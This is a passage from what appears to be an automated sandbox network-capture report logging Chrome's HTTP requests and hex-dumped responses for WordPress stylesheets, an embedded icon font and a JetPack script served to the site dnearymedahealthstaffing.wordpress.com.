                                                                                                                                                                                                                                                Data Ascii: 201px){.has-marketing-bar-theme-dyad .site-banner,.has-marketing-bar-theme-dyad-2 .site-banner{top:var(--wp-admin--marketing-bar--height)}.has-marketing-bar-theme-dyad.admin-bar .site-banner,.has-marketing-bar-theme-dyad-2.admin-bar .site-banner{top:calc(
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 29 7d 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 74 77 65 6e 74 79 2d 65 6c 65 76 65 6e 20 23 70 61 67 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 61 6c 63 28 32 65 6d 20 2b 20 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 2d 68 65 69 67 68 74 29 29 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 38 70 78 29 7b 2e 68 61 73 2d 6d 61 72 6b 65 74 69 6e 67 2d 62 61 72 2d 74 68 65 6d 65 2d 74 77 65 6e 74 79 2d 66 6f 75 72 74 65 65 6e 20 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 6d 61 72 6b 65 74 69 6e 67 2d
                                                                                                                                                                                                                                                Data Ascii: -bar--height))}.has-marketing-bar-theme-twenty-eleven #page{margin-top:calc(2em + var(--wp-admin--marketing-bar--height))}@media screen and (min-width:1008px){.has-marketing-bar-theme-twenty-fourteen .site-description{margin-top:var(--wp-admin--marketing-


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.1149742192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:32 UTC746OUTGET /_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.css,/wp-content/mu-plugins/wpcom-bbpress-premium-themes.css?m=1432920480j&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC459INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 369
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 19 May 2023 03:00:34 GMT
                                                                                                                                                                                                                                                Etag: "6466e652-171"
                                                                                                                                                                                                                                                Expires: Wed, 23 Apr 2025 23:19:11 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dfw BYPASS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC369INData Raw: 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 6c 69 67 68 74 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 6c 69 67 68 74 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 69 74 65 6d 7b 63 6f 6c 6f 72 3a 23 33 33 33 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 6c 69 67 68 74 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 70 6c 61 79 69 6e 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 64 61 72 6b 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 69 74 65 6d 20 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 77 70 2d 70 6c 61 79 6c 69 73 74 2d 63 61 70 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 62 62 70 2d 73 74
                                                                                                                                                                                                                                                Data Ascii: .wp-playlist-light{color:#000}.wp-playlist-light .wp-playlist-item{color:#333}.wp-playlist-light .wp-playlist-playing{background:#fff;color:#000}.wp-playlist-dark .wp-playlist-item .wp-playlist-caption{color:#fff}.wp-playlist-caption{display:block}.bbp-st


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.1149744192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:32 UTC803OUTGET /_static/??-eJx9jcEOwjAMQ3+IEnUH2AXxLVuVlUDaVG2mib8ngAQDJG72S2zDUlyQrJgV0uwKz5FygyApGXJMFzTXvsjWyAYIsihZur3E87Dq1BMmayjzCBMuWKHplfHnbTVdcWSJJuNj923/hSKKYwmDkuQP4yYeqN6jx3Twe9/5Xd/77nwDsx1cLg==&cssminify=yes HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC485INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/css;charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 40559
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Last-Modified: Wed, 03 Apr 2024 18:30:51 GMT
                                                                                                                                                                                                                                                Etag: "660da05b-9e6f"
                                                                                                                                                                                                                                                Expires: Sat, 22 Nov 2025 10:40:06 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca BYPASS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC884INData Raw: 70 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 73 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 70 78 7d 70 2e 63 6f 6d 6d 65 6e 74 2d 6e 6f 74 2d 6c 69 6b 65 64 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 70 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 73 20 61 2e 76 69 65 77 2d 6c 69 6b 65 72 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 64 69 76 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 73 2d 6f 76 65 72 6c 61 79 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 66 6f 6e 74 2d
                                                                                                                                                                                                                                                Data Ascii: p.comment-likes{height:16px;float:none;width:100%;clear:both;display:block;margin-left:-2px}p.comment-not-liked{cursor:pointer}p.comment-likes a.view-likers{text-decoration:underline;border:none}div.comment-likes-overlay{color:#555;position:absolute;font-
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 61 79 20 64 69 76 2e 69 6e 6e 65 72 20 75 6c 20 6c 69 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 35 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 7d 64 69 76 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 73 2d 6f 76 65 72 6c 61 79 20 64 69 76 2e 69 6e 6e 65 72 20 75 6c 2e 73 69 6e 67 6c 65 20 6c 69 7b 77 69 64 74 68 3a 31 30 30 25 7d 64 69 76 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 73 2d 6f 76 65 72 6c 61 79 20 64 69 76 2e 69 6e 6e 65 72 20 75 6c 2e 64 6f 75 62 6c 65 20 6c 69 7b 77 69 64 74 68 3a 35 30 25 7d 64 69 76 2e 63 6f 6d 6d
                                                                                                                                                                                                                                                Data Ascii: ay div.inner ul li{float:left;display:inline;padding:0;margin:0 0 5px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}div.comment-likes-overlay div.inner ul.single li{width:100%}div.comment-likes-overlay div.inner ul.double li{width:50%}div.comm
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 2c 70 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 64 20 61 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 2c 70 2e 63 6f 6d 6d 65 6e 74 2d 6e 6f 74 2d 6c 69 6b 65 64 3a 68 6f 76 65 72 20 61 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 66 31 38 33 31 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 7d 64 69 76 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 6b 65 73 2d 6f 76 65 72 6c 61 79 20 64 69 76 20 2e 73 6c 69 64 65 72 2d 6e 61 76 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 77 69 64 74 68 3a 33 31 30 70 78 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 6d 61 72 67 69 6e 3a 31 35 70 78 20 30 20 2d 31 35 70 78 20 2d 31 32 70 78 3b 74 65 78 74 2d 61 6c 69
                                                                                                                                                                                                                                                Data Ascii: ,p.comment-liked a.comment-like-link:before,p.comment-not-liked:hover a.comment-like-link:before{color:#f1831e;background:0 0}div.comment-likes-overlay div .slider-nav{position:relative;clear:both;width:310px;height:40px;margin:15px 0 -15px -12px;text-ali
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 77 69 70 65 2d 77 72 61 70 3e 64 69 76 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4e 6f 74 69 63 6f 6e 73 22 3b 73 72 63 3a 75 72 6c 28 2f 69 2f 6e 6f 74 69 63 6f 6e 73 2f 2e 2f 4e 6f 74 69 63 6f 6e 73 2e 65 6f 74 3f 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4e 6f 74 69 63 6f 6e 73 22 3b 73 72 63 3a 75 72 6c 28 22 64 61 74 61 3a 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 66 6f 6e 74 2d 77
                                                                                                                                                                                                                                                Data Ascii: wipe-wrap>div{float:left;width:100%;position:relative}@font-face{font-family:"Noticons";src:url(/i/noticons/./Noticons.eot?) format("embedded-opentype");font-weight:400;font-style:normal}@font-face{font-family:"Noticons";src:url("data:application/x-font-w
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 79 61 50 45 59 38 4f 6a 78 71 50 41 6f 38 55 6a 77 67 50 48 77 38 48 64 7a 33 48 64 49 34 4a 48 42 77 63 54 4f 77 76 6f 57 34 6a 45 6a 43 79 4d 63 41 31 4d 44 49 42 43 53 5a 30 42 52 41 76 44 32 63 41 41 50 6c 53 4f 6a 51 41 52 41 55 52 41 41 41 41 4c 41 41 73 41 43 77 41 4c 41 42 61 41 49 51 41 7a 41 44 79 41 51 41 42 48 41 46 47 41 5a 51 42 7a 67 49 49 41 72 49 44 54 41 4f 6b 41 2b 41 45 45 67 54 43 42 56 77 46 71 41 59 45 42 6e 59 48 43 41 63 71 42 32 6f 48 6a 67 66 49 43 43 59 4a 48 67 70 2b 43 7a 6f 4c 79 41 78 2b 44 4d 6f 4e 6d 41 33 71 44 69 77 4f 61 41 37 53 44 76 51 50 45 41 38 75 44 33 67 50 6d 67 2f 67 45 44 59 51 6f 42 44 65 45 52 51 52 55 68 47 63 45 66 59 53 59 42 4b 43 45 71 51 53 37 68 4d 4d 45 79 67 54 52 42 4e 79 45 34 6f 54 7a 68 51 47
                                                                                                                                                                                                                                                Data Ascii: yaPEY8OjxqPAo8UjwgPHw8Hdz3HdI4JHBwcTOwvoW4jEjCyMcA1MDIBCSZ0BRAvD2cAAPlSOjQARAURAAAALAAsACwALABaAIQAzADyAQABHAFGAZQBzgIIArIDTAOkA+AEEgTCBVwFqAYEBnYHCAcqB2oHjgfICCYJHgp+CzoLyAx+DMoNmA3qDiwOaA7SDvQPEA8uD3gPmg/gEDYQoBDeERQRUhGcEfYSYBKCEqQS7hMMEygTRBNyE4oTzhQG
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 54 4e 45 4c 46 42 2f 38 4d 62 6c 78 2f 43 6a 54 68 75 6f 61 2b 73 49 5a 6f 73 77 42 2f 44 47 63 64 36 4f 68 4b 72 39 71 39 4b 64 50 54 30 64 66 51 63 49 39 38 66 71 2b 71 6f 59 51 39 6b 64 47 77 54 55 65 62 76 39 39 39 57 4f 78 55 72 45 31 61 74 6d 6b 43 55 71 62 57 33 2b 66 66 50 78 38 71 6d 6a 2b 46 47 6c 45 33 48 6a 6d 33 43 53 6d 4c 4e 39 44 78 49 51 31 67 61 44 47 6c 6f 7a 36 45 2b 6d 64 5a 4e 6a 37 7a 51 33 68 43 72 57 79 6b 32 59 48 66 63 54 52 75 74 50 76 44 43 43 48 6b 39 74 46 36 78 73 4b 54 30 37 4e 6e 54 6f 35 41 45 4f 61 4c 67 62 51 64 4f 45 52 61 48 61 49 49 46 4a 47 67 79 66 55 51 53 75 45 38 35 64 59 42 54 7a 6b 62 33 39 47 41 49 49 52 36 6e 78 30 32 45 55 70 31 30 42 74 44 79 73 4a 4f 4f 55 79 41 57 6a 51 51 67 71 49 64 67 49 78 65 4e 2b
                                                                                                                                                                                                                                                Data Ascii: TNELFB/8Mblx/CjThuoa+sIZoswB/DGcd6OhKr9q9KdPT0dfQcI98fq+qoYQ9kdGwTUebv999WOxUrE1atmkCUqbW3+ffPx8qmj+FGlE3Hjm3CSmLN9DxIQ1gaDGloz6E+mdZNj7zQ3hCrWyk2YHfcTRutPvDCCHk9tF6xsKT07NnTo5AEOaLgbQdOERaHaIIFJGgyfUQSuE85dYBTzkb39GAIIR6nx02EUp10BtDysJOOUyAWjQQgqIdgIxeN+
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 36 73 75 72 6a 2b 4a 38 5a 73 58 6c 72 52 6e 35 4a 42 70 49 31 65 33 70 45 65 4d 4e 6f 4f 35 51 72 66 67 72 6c 75 69 68 39 34 43 6c 6a 6f 47 56 45 47 67 58 6f 69 55 4c 4d 65 31 69 35 76 4c 41 66 6a 38 30 68 72 35 4f 2b 50 2f 33 4a 56 6a 35 6d 37 6c 57 74 38 52 36 37 58 5a 36 7a 71 44 68 69 31 77 6f 2f 6b 4a 4d 44 54 2f 4e 6a 63 51 58 6d 49 6c 33 54 78 38 51 63 45 73 2b 54 54 77 79 2b 63 67 2f 50 61 52 46 51 6e 33 54 62 54 45 43 5a 33 57 67 52 57 73 35 6f 67 39 56 49 42 38 58 72 67 52 57 74 4e 38 59 77 7a 46 77 73 34 52 44 4d 33 55 78 73 4e 57 46 54 4c 4e 37 49 52 79 4f 55 45 47 69 41 64 49 52 44 4e 6e 2b 52 31 79 4e 49 63 69 67 63 69 6a 58 68 6d 46 57 53 4a 52 6d 62 65 4b 41 6a 4d 5a 76 31 37 44 4d 66 44 4c 58 4d 78 34 7a 52 43 4e 2b 4b 6c 2b 4a 78 33 2b
                                                                                                                                                                                                                                                Data Ascii: 6surj+J8ZsXlrRn5JBpI1e3pEeMNoO5Qrfgrluih94CljoGVEGgXoiULMe1i5vLAfj80hr5O+P/3JVj5m7lWt8R67XZ6zqDhi1wo/kJMDT/NjcQXmIl3Tx8QcEs+TTwy+cg/PaRFQn3TbTECZ3WgRWs5og9VIB8XrgRWtN8YwzFws4RDM3UxsNWFTLN7IRyOUEGiAdIRDNn+R1yNIcigcijXhmFWSJRmbeKAjMZv17DMfDLXMx4zRCN+Kl+Jx3+
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 37 61 6d 2f 61 46 42 38 77 5a 61 44 52 2b 5a 73 2b 50 4e 4c 2b 35 62 56 7a 30 6d 51 50 31 5a 76 32 42 58 37 35 65 58 63 34 31 70 33 64 2b 54 47 59 35 64 4d 44 75 2f 36 6a 35 71 46 4e 7a 32 44 71 34 35 65 2f 4d 51 31 72 63 46 4a 4b 7a 66 66 50 76 48 57 42 52 5a 37 62 74 61 45 6a 46 79 44 31 72 76 37 2b 5a 58 74 2b 2b 2f 63 76 6d 35 36 53 4f 55 70 61 54 36 38 4d 49 31 74 39 4a 79 4f 67 32 59 47 59 6e 47 54 45 31 50 4f 51 68 76 46 71 34 32 79 32 71 78 41 77 6e 41 38 35 67 2b 6b 4f 41 74 4d 48 59 70 73 41 66 62 48 47 65 53 69 63 77 76 53 46 57 4c 6f 4a 4a 73 66 6e 59 39 72 55 70 68 6a 39 34 36 32 67 6a 45 46 32 79 65 74 2f 2f 56 4e 6b 2b 70 57 37 33 75 6e 64 2b 33 4a 2f 56 64 4e 4b 4f 6c 5a 59 69 77 51 4f 51 4d 6e 69 72 71 52 6f 35 57 2b 56 52 66 64 30 31 4d
                                                                                                                                                                                                                                                Data Ascii: 7am/aFB8wZaDR+Zs+PNL+5bVz0mQP1Zv2BX75eXc41p3d+TGY5dMDu/6j5qFNz2Dq45e/MQ1rcFJKzffPvHWBRZ7btaEjFyD1rv7+ZXt++/cvm56SOUpaT68MI1t9JyOg2YGYnGTE1POQhvFq42y2qxAwnA85g+kOAtMHYpsAfbHGeSicwvSFWLoJJsfnY9rUphj9462gjEF2yet//VNk+pW73und+3J/VdNKOlZYiwQOQMnirqRo5W+VRfd01M
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 6e 51 78 4d 61 38 52 51 44 6d 49 6a 68 7a 77 42 35 74 56 69 4d 4f 53 59 66 77 42 61 43 6f 51 31 69 5a 4d 61 53 71 6b 41 4a 6e 51 78 4e 43 67 52 45 45 39 55 4e 62 4b 53 42 58 46 4f 30 58 30 45 66 73 30 52 6f 6c 77 45 45 76 71 41 2b 34 73 59 51 61 59 34 32 65 4d 68 79 57 6a 59 67 48 6b 52 6c 2f 53 4f 47 56 4b 50 41 69 75 41 55 61 76 41 54 74 42 6c 48 36 52 69 6e 49 34 56 42 52 58 6f 52 4c 4e 45 6d 69 34 41 47 55 47 2f 4d 5a 34 44 4a 37 48 4a 55 45 43 63 6d 2b 30 43 67 49 36 53 6c 45 6f 42 59 64 6b 4e 77 57 68 44 49 2b 2b 74 35 39 38 75 47 7a 5a 49 72 50 68 30 42 58 72 73 47 76 44 32 4c 59 56 62 2b 2b 65 58 70 51 49 51 6f 39 71 65 54 7a 38 33 6c 65 58 33 49 4f 64 38 31 32 2b 69 38 6e 76 62 2b 4b 48 44 65 76 59 64 75 6e 61 71 62 4f 36 48 72 75 71 4c 62 4e 6e
                                                                                                                                                                                                                                                Data Ascii: nQxMa8RQDmIjhzwB5tViMOSYfwBaCoQ1iZMaSqkAJnQxNCgREE9UNbKSBXFO0X0Efs0RolwEEvqA+4sYQaY42eMhyWjYgHkRl/SOGVKPAiuAUavATtBlH6RinI4VBRXoRLNEmi4AGUG/MZ4DJ7HJUECcm+0CgI6SlEoBYdkNwWhDI++t598uGzZIrPh0BXrsGvD2LYVb++eXpQIQo9qeTz83leX3IOd812+i8nvb+KHDevYdunaqbO6HruqLbNn
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC1369INData Raw: 7a 43 5a 77 30 4c 54 5a 74 7a 33 59 36 6e 46 38 7a 63 4f 69 56 75 45 72 4f 7a 5a 59 6e 38 6e 5a 4f 74 4e 70 66 54 36 33 52 6b 47 72 6b 38 5a 31 59 32 7a 76 57 55 36 6f 72 4b 2b 53 65 54 6e 33 42 69 70 69 43 61 79 6b 64 63 4d 6d 72 63 74 5a 32 74 5a 5a 34 63 44 5a 42 59 4b 53 65 33 4f 4e 78 57 58 74 34 31 61 56 78 74 57 56 62 6d 6d 31 70 58 39 2f 4c 37 66 76 48 36 37 50 47 72 36 31 79 63 72 69 41 76 41 7a 48 38 64 53 50 51 31 45 74 68 54 70 61 67 61 36 42 33 72 44 4a 54 4e 41 66 6f 46 42 4f 41 7a 56 4d 6b 79 6f 4d 73 54 59 55 63 6d 49 36 59 61 67 48 39 51 2f 38 67 44 5a 57 31 72 53 6d 67 4d 76 67 65 67 42 62 6c 74 65 59 68 50 4e 47 63 77 6a 43 44 37 79 31 70 65 42 4f 54 68 34 64 78 2b 33 56 48 46 71 31 66 4e 6d 48 63 36 74 38 2f 41 2f 44 62 4d 4b 4b 71 63
                                                                                                                                                                                                                                                Data Ascii: zCZw0LTZtz3Y6nF8zcOiVuErOzZYn8nZOtNpfT63RkGrk8Z1Y2zvWU6orK+SeTn3BipiCaykdcMmrctZ2tZZ4cDZBYKSe3ONxWXt41aVxtWVbmm1pX9/L7fvH67PGr61ycriAvAzH8dSPQ1EthTpaga6B3rDJTNAfoFBOAzVMkyoMsTYUcmI6YagH9Q/8gDZW1rSmgMvgegBblteYhPNGcwjCD7y1peBOTh4dx+3VHFq1fNmHc6t8/A/DbMKKqc


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.1149746192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:32 UTC624OUTGET /wp-content/js/rlt-proxy.js?m=1720530689i HTTP/1.1
                                                                                                                                                                                                                                                Host: s1.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://dnearymedahealthstaffing.wordpress.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC480INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:32 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                Content-Length: 2481
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                x-minify: t
                                                                                                                                                                                                                                                x-minify-cache: hit
                                                                                                                                                                                                                                                etag: W/5444-1720530699594.9683
                                                                                                                                                                                                                                                Expires: Mon, 20 Oct 2025 02:02:58 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _bur MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 2
                                                                                                                                                                                                                                                2024-12-20 15:45:33 UTC889INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 76 61 72 20 65 3b 76 61 72 20 6e 3b 76 61 72 20 6f 3d 5b 5d 3b 76 61 72 20 69 3d 5b 5d 3b 76 61 72 20 72 3d 66 61 6c 73 65 3b 76 61 72 20 61 3d 22 6a 65 74 70 61 63 6b 3a 77 70 63 6f 6d 52 4c 54 22 3b 66 75 6e 63 74 69 6f 6e 20 63 28 74 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 72 65 74 75 72 6e 20 6e 2e 69 6e 63 6c 75 64 65 73 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 6e 29 7b 69 66 28 65 26 26 74 79 70 65 6f 66 20 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 74 72 79 7b 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 74 79 70 65 3a 22 72
